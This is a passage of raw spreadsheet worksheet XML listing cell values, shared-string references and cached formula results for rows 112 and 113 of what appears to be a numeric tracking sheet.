      <c r="FQ112" s="111">
        <v>0.0</v>
      </c>
      <c r="FR112" s="111">
        <v>0.0</v>
      </c>
      <c r="FS112" s="112">
        <v>26.0</v>
      </c>
      <c r="FT112" s="112">
        <v>9.0</v>
      </c>
      <c r="FU112" s="112">
        <v>10.0</v>
      </c>
      <c r="FV112" s="112">
        <v>0.0</v>
      </c>
      <c r="FW112" s="112">
        <v>11.0</v>
      </c>
      <c r="FX112" s="112">
        <v>11.0</v>
      </c>
      <c r="FY112" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ112" s="112">
        <v>0.0</v>
      </c>
      <c r="GA112" s="112">
        <v>0.0</v>
      </c>
      <c r="GB112" s="112">
        <v>0.0</v>
      </c>
      <c r="GC112" s="112">
        <v>0.0</v>
      </c>
      <c r="GD112" s="112">
        <v>0.0</v>
      </c>
      <c r="GE112" s="112">
        <v>0.0</v>
      </c>
      <c r="GF112" s="112">
        <v>0.0</v>
      </c>
      <c r="GG112" s="112">
        <v>0.0</v>
      </c>
      <c r="GH112" s="113">
        <f t="shared" si="193"/>
        <v>9</v>
      </c>
      <c r="GI112" s="113">
        <f t="shared" si="194"/>
        <v>0</v>
      </c>
      <c r="GJ112" s="113">
        <f t="shared" si="195"/>
        <v>0</v>
      </c>
      <c r="GK112" s="113">
        <f t="shared" si="196"/>
        <v>10</v>
      </c>
      <c r="GL112" s="113">
        <f t="shared" si="197"/>
        <v>0</v>
      </c>
      <c r="GM112" s="113">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="GN112" s="113">
        <f t="shared" si="199"/>
        <v>11</v>
      </c>
      <c r="GO112" s="113">
        <f t="shared" si="200"/>
        <v>0</v>
      </c>
      <c r="GP112" s="113">
        <f t="shared" si="201"/>
        <v>0</v>
      </c>
      <c r="GQ112" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR112" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS112" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT112" s="94"/>
      <c r="GU112" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV112" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW112" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX112" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY112" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ112" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA112" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB112" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC112" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD112" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE112" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF112" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG112" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH112" s="116" t="s">
        <v>1901</v>
      </c>
      <c r="HI112" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ112" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK112" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL112" s="93">
        <v>186.0</v>
      </c>
      <c r="HM112" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN112" s="93">
        <v>0.0</v>
      </c>
      <c r="HO112" s="93">
        <v>1.0</v>
      </c>
      <c r="HP112" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ112" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR112" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS112" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT112" s="139" t="s">
        <v>1902</v>
      </c>
      <c r="HU112" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV112" s="119">
        <v>56101.0</v>
      </c>
      <c r="HW112" s="119">
        <v>1.0</v>
      </c>
      <c r="HX112" s="119">
        <v>2.0</v>
      </c>
      <c r="HY112" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ112" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA112" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB112" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC112" s="120">
        <f t="shared" si="162"/>
        <v>56101</v>
      </c>
      <c r="ID112" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE112" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF112" s="120">
        <v>56101.0</v>
      </c>
      <c r="IG112" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH112" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II112" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ112" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK112" s="99">
        <v>27.0</v>
      </c>
      <c r="IL112" s="99">
        <v>0.0</v>
      </c>
      <c r="IM112" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN112" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO112" s="98">
        <v>0.0</v>
      </c>
      <c r="IP112" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ112" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR112" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS112" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT112" s="127"/>
      <c r="IU112" s="127"/>
      <c r="IV112" s="127"/>
      <c r="IW112" s="127"/>
      <c r="IX112" s="127"/>
      <c r="IY112" s="127"/>
      <c r="IZ112" s="127"/>
      <c r="JA112" s="127"/>
      <c r="JB112" s="127"/>
      <c r="JC112" s="127"/>
      <c r="JD112" s="127"/>
      <c r="JE112" s="127"/>
      <c r="JF112" s="127"/>
      <c r="JG112" s="127"/>
      <c r="JH112" s="127"/>
      <c r="JI112" s="127"/>
      <c r="JJ112" s="127"/>
      <c r="JK112" s="127"/>
      <c r="JL112" s="127"/>
      <c r="JM112" s="127"/>
      <c r="JN112" s="127"/>
      <c r="JO112" s="127"/>
      <c r="JP112" s="127"/>
      <c r="JQ112" s="127"/>
      <c r="JR112" s="127"/>
      <c r="JS112" s="127"/>
      <c r="JT112" s="127"/>
      <c r="JU112" s="127"/>
      <c r="JV112" s="127"/>
      <c r="JW112" s="127"/>
      <c r="JX112" s="127"/>
      <c r="JY112" s="127"/>
      <c r="JZ112" s="127"/>
      <c r="KA112" s="127"/>
      <c r="KB112" s="127"/>
      <c r="KC112" s="127"/>
      <c r="KD112" s="127"/>
      <c r="KE112" s="127"/>
      <c r="KF112" s="127"/>
      <c r="KG112" s="127"/>
      <c r="KH112" s="127"/>
      <c r="KI112" s="127"/>
      <c r="KJ112" s="127"/>
      <c r="KK112" s="127"/>
      <c r="KL112" s="127"/>
      <c r="KM112" s="127"/>
      <c r="KN112" s="127"/>
      <c r="KO112" s="127"/>
      <c r="KP112" s="127"/>
      <c r="KQ112" s="127"/>
      <c r="KR112" s="127"/>
      <c r="KS112" s="127"/>
      <c r="KT112" s="127"/>
      <c r="KU112" s="127"/>
      <c r="KV112" s="127"/>
      <c r="KW112" s="127"/>
      <c r="KX112" s="127"/>
      <c r="KY112" s="127"/>
      <c r="KZ112" s="127"/>
      <c r="LA112" s="127"/>
      <c r="LB112" s="127"/>
      <c r="LC112" s="127"/>
      <c r="LD112" s="127"/>
      <c r="LE112" s="127"/>
      <c r="LF112" s="127"/>
      <c r="LG112" s="127"/>
      <c r="LH112" s="127"/>
      <c r="LI112" s="127"/>
      <c r="LJ112" s="127"/>
      <c r="LK112" s="127"/>
      <c r="LL112" s="127"/>
      <c r="LM112" s="127"/>
      <c r="LN112" s="127"/>
      <c r="LO112" s="127"/>
      <c r="LP112" s="127"/>
      <c r="LQ112" s="127"/>
      <c r="LR112" s="127"/>
      <c r="LS112" s="127"/>
      <c r="LT112" s="127"/>
      <c r="LU112" s="127"/>
      <c r="LV112" s="127"/>
      <c r="LW112" s="127"/>
      <c r="LX112" s="127"/>
      <c r="LY112" s="127"/>
      <c r="LZ112" s="127"/>
      <c r="MA112" s="127"/>
      <c r="MB112" s="127"/>
      <c r="MC112" s="127"/>
      <c r="MD112" s="127"/>
      <c r="ME112" s="127"/>
      <c r="MF112" s="127"/>
      <c r="MG112" s="127"/>
      <c r="MH112" s="127"/>
      <c r="MI112" s="127"/>
      <c r="MJ112" s="127"/>
      <c r="MK112" s="127"/>
      <c r="ML112" s="127"/>
      <c r="MM112" s="127"/>
      <c r="MN112" s="127"/>
      <c r="MO112" s="127"/>
      <c r="MP112" s="127"/>
      <c r="MQ112" s="127"/>
      <c r="MR112" s="127"/>
      <c r="MS112" s="127"/>
      <c r="MT112" s="127"/>
      <c r="MU112" s="127"/>
      <c r="MV112" s="127"/>
      <c r="MW112" s="127"/>
      <c r="MX112" s="127"/>
      <c r="MY112" s="127"/>
      <c r="MZ112" s="127"/>
      <c r="NA112" s="127"/>
      <c r="NB112" s="127"/>
      <c r="NC112" s="127"/>
      <c r="ND112" s="127"/>
      <c r="NE112" s="127"/>
      <c r="NF112" s="127"/>
      <c r="NG112" s="127"/>
      <c r="NH112" s="127"/>
      <c r="NI112" s="127"/>
      <c r="NJ112" s="127"/>
      <c r="NK112" s="127"/>
      <c r="NL112" s="127"/>
      <c r="NM112" s="127"/>
      <c r="NN112" s="127"/>
      <c r="NO112" s="127"/>
      <c r="NP112" s="127"/>
      <c r="NQ112" s="127"/>
      <c r="NR112" s="127"/>
      <c r="NS112" s="127"/>
      <c r="NT112" s="127"/>
      <c r="NU112" s="127"/>
      <c r="NV112" s="127"/>
      <c r="NW112" s="127"/>
      <c r="NX112" s="127"/>
      <c r="NY112" s="127"/>
    </row>
    <row r="113" ht="153.75" customHeight="1">
      <c r="B113" s="89" t="s">
        <v>209</v>
      </c>
      <c r="C113" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D113" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E113" s="90" t="s">
        <v>1903</v>
      </c>
      <c r="F113" s="90" t="s">
        <v>1904</v>
      </c>
      <c r="G113" s="90" t="s">
        <v>1905</v>
      </c>
      <c r="H113" s="90" t="s">
        <v>1906</v>
      </c>
      <c r="I113" s="92" t="s">
        <v>1907</v>
      </c>
      <c r="J113" s="92" t="s">
        <v>1908</v>
      </c>
      <c r="K113" s="92" t="s">
        <v>1909</v>
      </c>
      <c r="L113" s="93" t="s">
        <v>679</v>
      </c>
      <c r="M113" s="93">
        <v>266.0</v>
      </c>
      <c r="N113" s="93">
        <v>123.0</v>
      </c>
      <c r="O113" s="93">
        <v>0.0</v>
      </c>
      <c r="P113" s="93">
        <v>123.0</v>
      </c>
      <c r="Q113" s="93">
        <f t="shared" si="160"/>
        <v>123</v>
      </c>
      <c r="R113" s="93">
        <v>123.0</v>
      </c>
      <c r="S113" s="93">
        <v>0.0</v>
      </c>
      <c r="T113" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U113" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V113" s="126" t="s">
        <v>1910</v>
      </c>
      <c r="W113" s="96" t="s">
        <v>1911</v>
      </c>
      <c r="X113" s="126" t="s">
        <v>1912</v>
      </c>
      <c r="Y113" s="126" t="s">
        <v>1913</v>
      </c>
      <c r="Z113" s="132" t="s">
        <v>1914</v>
      </c>
      <c r="AA113" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB113" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC113" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD113" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE113" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF113" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG113" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH113" s="99" t="s">
        <v>1915</v>
      </c>
      <c r="AI113" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ113" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK113" s="100" t="s">
        <v>1546</v>
      </c>
      <c r="AL113" s="100">
        <v>4.0</v>
      </c>
      <c r="AM113" s="100">
        <v>20.0</v>
      </c>
      <c r="AN113" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO113" s="100" t="s">
        <v>1546</v>
      </c>
      <c r="AP113" s="100">
        <v>4.0</v>
      </c>
      <c r="AQ113" s="100">
        <v>20.0</v>
      </c>
      <c r="AR113" s="100" t="s">
        <v>1546</v>
      </c>
      <c r="AS113" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT113" s="100" t="str">
        <f t="shared" si="164"/>
        <v>366, 29456, 384, 408</v>
      </c>
      <c r="AU113" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV113" s="100" t="s">
        <v>1546</v>
      </c>
      <c r="AW113" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX113" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY113" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ113" s="100">
        <v>0.0</v>
      </c>
      <c r="BA113" s="102">
        <v>266.0</v>
      </c>
      <c r="BB113" s="102">
        <v>0.0</v>
      </c>
      <c r="BC113" s="102">
        <v>10.0</v>
      </c>
      <c r="BD113" s="102">
        <v>20.0</v>
      </c>
      <c r="BE113" s="102">
        <v>0.0</v>
      </c>
      <c r="BF113" s="102">
        <v>0.0</v>
      </c>
      <c r="BG113" s="102">
        <v>0.0</v>
      </c>
      <c r="BH113" s="102">
        <v>0.0</v>
      </c>
      <c r="BI113" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ113" s="102">
        <v>10.0</v>
      </c>
      <c r="BK113" s="102">
        <v>20.0</v>
      </c>
      <c r="BL113" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM113" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN113" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO113" s="103">
        <f t="shared" si="170"/>
        <v>0.08130081301</v>
      </c>
      <c r="BP113" s="103">
        <f t="shared" si="171"/>
        <v>0.08130081301</v>
      </c>
      <c r="BQ113" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR113" s="103">
        <f t="shared" si="173"/>
        <v>0.162601626</v>
      </c>
      <c r="BS113" s="103">
        <f t="shared" si="174"/>
        <v>0.162601626</v>
      </c>
      <c r="BT113" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU113" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV113" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW113" s="104" t="s">
        <v>1547</v>
      </c>
      <c r="BX113" s="104">
        <v>5.0</v>
      </c>
      <c r="BY113" s="104">
        <v>25.0</v>
      </c>
      <c r="BZ113" s="101">
        <v>2100366.0</v>
      </c>
      <c r="CA113" s="104" t="s">
        <v>1546</v>
      </c>
      <c r="CB113" s="104">
        <v>4.0</v>
      </c>
      <c r="CC113" s="104">
        <v>20.0</v>
      </c>
      <c r="CD113" s="104" t="s">
        <v>1547</v>
      </c>
      <c r="CE113" s="104">
        <v>2100366.0</v>
      </c>
      <c r="CF113" s="104" t="str">
        <f t="shared" si="165"/>
        <v>366, 29456, 384, 408, 2100366</v>
      </c>
      <c r="CG113" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH113" s="104" t="s">
        <v>1547</v>
      </c>
      <c r="CI113" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ113" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK113" s="104">
        <v>0.0</v>
      </c>
      <c r="CL113" s="104">
        <v>0.0</v>
      </c>
      <c r="CM113" s="105">
        <v>263.0</v>
      </c>
      <c r="CN113" s="105">
        <v>0.0</v>
      </c>
      <c r="CO113" s="105">
        <v>10.0</v>
      </c>
      <c r="CP113" s="105">
        <v>20.0</v>
      </c>
      <c r="CQ113" s="105">
        <v>5.0</v>
      </c>
      <c r="CR113" s="105">
        <v>20.0</v>
      </c>
      <c r="CS113" s="105">
        <v>0.0</v>
      </c>
      <c r="CT113" s="105">
        <v>0.0</v>
      </c>
      <c r="CU113" s="105">
        <v>0.0</v>
      </c>
      <c r="CV113" s="105">
        <v>0.0</v>
      </c>
      <c r="CW113" s="105">
        <v>0.0</v>
      </c>
      <c r="CX113" s="105">
        <v>10.0</v>
      </c>
      <c r="CY113" s="105">
        <v>20.0</v>
      </c>
      <c r="CZ113" s="105">
        <v>0.0</v>
      </c>
      <c r="DA113" s="105">
        <v>20.0</v>
      </c>
      <c r="DB113" s="106">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="DC113" s="106">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="DD113" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE113" s="106">
        <f t="shared" si="179"/>
        <v>0.08130081301</v>
      </c>
      <c r="DF113" s="106">
        <f t="shared" si="180"/>
        <v>0.08130081301</v>
      </c>
      <c r="DG113" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH113" s="106">
        <f t="shared" si="181"/>
        <v>0.162601626</v>
      </c>
      <c r="DI113" s="106">
        <f t="shared" si="182"/>
        <v>0.162601626</v>
      </c>
      <c r="DJ113" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK113" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL113" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM113" s="108" t="s">
        <v>1916</v>
      </c>
      <c r="DN113" s="108">
        <v>7.0</v>
      </c>
      <c r="DO113" s="108">
        <v>271.0</v>
      </c>
      <c r="DP113" s="101">
        <v>2100366.0</v>
      </c>
      <c r="DQ113" s="108" t="s">
        <v>1917</v>
      </c>
      <c r="DR113" s="108">
        <v>5.0</v>
      </c>
      <c r="DS113" s="108">
        <v>266.0</v>
      </c>
      <c r="DT113" s="108" t="s">
        <v>1918</v>
      </c>
      <c r="DU113" s="108">
        <v>2100366.0</v>
      </c>
      <c r="DV113" s="108" t="str">
        <f t="shared" si="166"/>
        <v>366, 29456, 384, 408, 2100366, 15935</v>
      </c>
      <c r="DW113" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX113" s="108" t="s">
        <v>1918</v>
      </c>
      <c r="DY113" s="108">
        <v>57756.0</v>
      </c>
      <c r="DZ113" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA113" s="108">
        <v>1.0</v>
      </c>
      <c r="EB113" s="108">
        <v>123.0</v>
      </c>
      <c r="EC113" s="109">
        <v>266.0</v>
      </c>
      <c r="ED113" s="109">
        <v>123.0</v>
      </c>
      <c r="EE113" s="109">
        <v>133.0</v>
      </c>
      <c r="EF113" s="109">
        <v>266.0</v>
      </c>
      <c r="EG113" s="109">
        <v>5.0</v>
      </c>
      <c r="EH113" s="109">
        <v>271.0</v>
      </c>
      <c r="EI113" s="109">
        <v>123.0</v>
      </c>
      <c r="EJ113" s="109">
        <v>0.0</v>
      </c>
      <c r="EK113" s="109">
        <v>123.0</v>
      </c>
      <c r="EL113" s="109">
        <v>123.0</v>
      </c>
      <c r="EM113" s="109">
        <v>123.0</v>
      </c>
      <c r="EN113" s="109">
        <v>133.0</v>
      </c>
      <c r="EO113" s="109">
        <v>266.0</v>
      </c>
      <c r="EP113" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ113" s="109">
        <v>266.0</v>
      </c>
      <c r="ER113" s="110">
        <f t="shared" si="184"/>
        <v>1</v>
      </c>
      <c r="ES113" s="110">
        <f t="shared" si="185"/>
        <v>1</v>
      </c>
      <c r="ET113" s="110">
        <f t="shared" si="186"/>
        <v>1</v>
      </c>
      <c r="EU113" s="110">
        <f t="shared" si="187"/>
        <v>1.081300813</v>
      </c>
      <c r="EV113" s="110">
        <f t="shared" si="188"/>
        <v>1.081300813</v>
      </c>
      <c r="EW113" s="110">
        <f t="shared" si="189"/>
        <v>1</v>
      </c>
      <c r="EX113" s="110">
        <f t="shared" si="190"/>
        <v>2.203252033</v>
      </c>
      <c r="EY113" s="110">
        <f t="shared" si="191"/>
        <v>2.162601626</v>
      </c>
      <c r="EZ113" s="110">
        <f t="shared" si="192"/>
        <v>1</v>
      </c>
      <c r="FA113" s="110">
        <f t="shared" si="106"/>
        <v>1</v>
      </c>
      <c r="FB113" s="110">
        <f t="shared" si="107"/>
        <v>1</v>
      </c>
      <c r="FC113" s="111" t="s">
        <v>1919</v>
      </c>
      <c r="FD113" s="111">
        <v>12.0</v>
      </c>
      <c r="FE113" s="111">
        <v>291.0</v>
      </c>
      <c r="FF113" s="101" t="s">
        <v>1920</v>
      </c>
      <c r="FG113" s="111" t="s">
        <v>1921</v>
      </c>
      <c r="FH113" s="111">
        <v>6.0</v>
      </c>
      <c r="FI113" s="111">
        <v>266.0</v>
      </c>
      <c r="FJ113" s="111" t="s">
        <v>1922</v>
      </c>
      <c r="FK113" s="111" t="s">
        <v>1923</v>
      </c>
      <c r="FL113" s="111" t="str">
        <f t="shared" si="155"/>
        <v>366, 29456, 384, 408, 15935 2002752, 2002749, 2100366, 2100384, 2100408, 2101620</v>
      </c>
      <c r="FM113" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN113" s="111" t="s">
        <v>1922</v>
      </c>
      <c r="FO113" s="111">
        <v>57756.0</v>
      </c>
      <c r="FP113" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ113" s="111">
        <v>1.0</v>
      </c>
      <c r="FR113" s="111">
        <v>123.0</v>
      </c>
      <c r="FS113" s="112">
        <v>263.0</v>
      </c>
      <c r="FT113" s="112">
        <v>125.0</v>
      </c>
      <c r="FU113" s="112">
        <v>136.0</v>
      </c>
      <c r="FV113" s="112">
        <v>266.0</v>
      </c>
      <c r="FW113" s="112">
        <v>25.0</v>
      </c>
      <c r="FX113" s="112">
        <v>291.0</v>
      </c>
      <c r="FY113" s="112">
        <v>123.0</v>
      </c>
      <c r="FZ113" s="112">
        <v>0.0</v>
      </c>
      <c r="GA113" s="112">
        <v>123.0</v>
      </c>
      <c r="GB113" s="112">
        <v>123.0</v>
      </c>
      <c r="GC113" s="112">
        <v>123.0</v>
      </c>
      <c r="GD113" s="112">
        <v>133.0</v>
      </c>
      <c r="GE113" s="112">
        <v>266.0</v>
      </c>
      <c r="GF113" s="112">
        <v>0.0</v>
      </c>
      <c r="GG113" s="112">
        <v>266.0</v>
      </c>
      <c r="GH113" s="113">
        <f t="shared" si="193"/>
        <v>1.016260163</v>
      </c>
      <c r="GI113" s="113">
        <f t="shared" si="194"/>
        <v>1</v>
      </c>
      <c r="GJ113" s="113">
        <f t="shared" si="195"/>
        <v>1</v>
      </c>
      <c r="GK113" s="113">
        <f t="shared" si="196"/>
        <v>1.105691057</v>
      </c>
      <c r="GL113" s="113">
        <f t="shared" si="197"/>
        <v>1.081300813</v>
      </c>
      <c r="GM113" s="113">
        <f t="shared" si="198"/>
        <v>1</v>
      </c>
      <c r="GN113" s="113">
        <f t="shared" si="199"/>
        <v>2.365853659</v>
      </c>
      <c r="GO113" s="113">
        <f t="shared" si="200"/>
        <v>2.162601626</v>
      </c>
      <c r="GP113" s="113">
        <f t="shared" si="201"/>
        <v>1</v>
      </c>
      <c r="GQ113" s="114">
        <f t="shared" si="108"/>
        <v>1</v>
      </c>
      <c r="GR113" s="113">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="GS113" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT113" s="94" t="s">
        <v>1924</v>
      </c>
      <c r="GU113" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV113" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW113" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX113" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY113" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ113" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA113" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB113" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC113" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD113" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE113" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF113" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG113" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH113" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI113" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ113" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK113" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL113" s="93">
        <v>263.0</v>
      </c>
      <c r="HM113" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN113" s="93">
        <v>0.0</v>
      </c>
      <c r="HO113" s="93">
        <v>0.0</v>
      </c>
      <c r="HP113" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ113" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR113" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS113" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT113" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU113" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV113" s="119">
        <v>9999.0</v>
      </c>
      <c r="HW113" s="119">
        <v>1.0</v>
      </c>
      <c r="HX113" s="119">
        <v>17.0</v>
      </c>
      <c r="HY113" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ113" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA113" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB113" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC113" s="120" t="s">
        <v>12</v>
      </c>
      <c r="ID113" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE113" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF113" s="120">
        <v>9999.0</v>
      </c>
      <c r="IG113" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH113" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II113" s="99" t="s">
        <v>1925</v>
      </c>
      <c r="IJ113" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK113" s="99">
        <v>262.0</v>
      </c>
      <c r="IL113" s="99">
        <v>0.0</v>
      </c>
      <c r="IM113" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN113" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO113" s="98">
        <v>0.0</v>
      </c>
      <c r="IP113" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ113" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR113" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS113" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT113" s="127"/>
      <c r="IU113" s="127"/>
      <c r="IV113" s="127"/>
      <c r="IW113" s="127"/>
      <c r="IX113" s="127"/>
      <c r="IY113" s="127"/>
      <c r="IZ113" s="127"/>
      <c r="JA113" s="127"/>
      <c r="JB113" s="127"/>
      <c r="JC113" s="127"/>
      <c r="JD113" s="127"/>
      <c r="JE113" s="127"/>
      <c r="JF113" s="127"/>
      <c r="JG113" s="127"/>
      <c r="JH113" s="127"/>
      <c r="JI113" s="127"/>
      <c r="JJ113" s="127"/>
      <c r="JK113" s="127"/>
      <c r="JL113" s="127"/>
      <c r="JM113" s="127"/>
      <c r="JN113" s="127"/>
      <c r="JO113" s="127"/>
      <c r="JP113" s="127"/>
      <c r="JQ113" s="127"/>
      <c r="JR113" s="127"/>
      <c r="JS113" s="127"/>
      <c r="JT113" s="127"/>
      <c r="JU113" s="127"/>
      <c r="JV113" s="127"/>
      <c r="JW113" s="127"/>
      <c r="JX113" s="127"/>
      <c r="JY113" s="127"/>
      <c r="JZ113" s="127"/>
      <c r="KA113" s="127"/>
      <c r="KB113" s="127"/>
      <c r="KC113" s="127"/>
      <c r="KD113" s="127"/>
      <c r="KE113" s="127"/>
      <c r="KF113" s="127"/>
      <c r="KG113" s="127"/>
      <c r="KH113" s="127"/>
      <c r="KI113" s="127"/>
      <c r="KJ113" s="127"/>
      <c r="KK113" s="127"/>
      <c r="KL113" s="127"/>
      <c r="KM113" s="127"/>
      <c r="KN113" s="127"/>
      <c r="KO113" s="127"/>
      <c r="KP113" s="127"/>
      <c r="KQ113" s="127"/>
      <c r="KR113" s="127"/>
      <c r="KS113" s="127"/>
      <c r="KT113" s="127"/>
      <c r="KU113" s="127"/>
      <c r="KV113" s="127"/>
      <c r="KW113" s="127"/>
      <c r="KX113" s="127"/>
      <c r="KY113" s="127"/>
      <c r="KZ113" s="127"/>
      <c r="LA113" s="127"/>
      <c r="LB113" s="127"/>
      <c r="LC113" s="127"/>
      <c r="LD113" s="127"/>
      <c r="LE113" s="127"/>
      <c r="LF113" s="127"/>
      <c r="LG113" s="127"/>
      <c r="LH113" s="127"/>
      <c r="LI113" s="127"/>
      <c r="LJ113" s="127"/>
      <c r="LK113" s="127"/>
      <c r="LL113" s="127"/>
      <c r="LM113" s="127"/>
      <c r="LN113" s="127"/>
      <c r="LO113" s="127"/>
      <c r="LP113" s="127"/>
      <c r="LQ113" s="127"/>
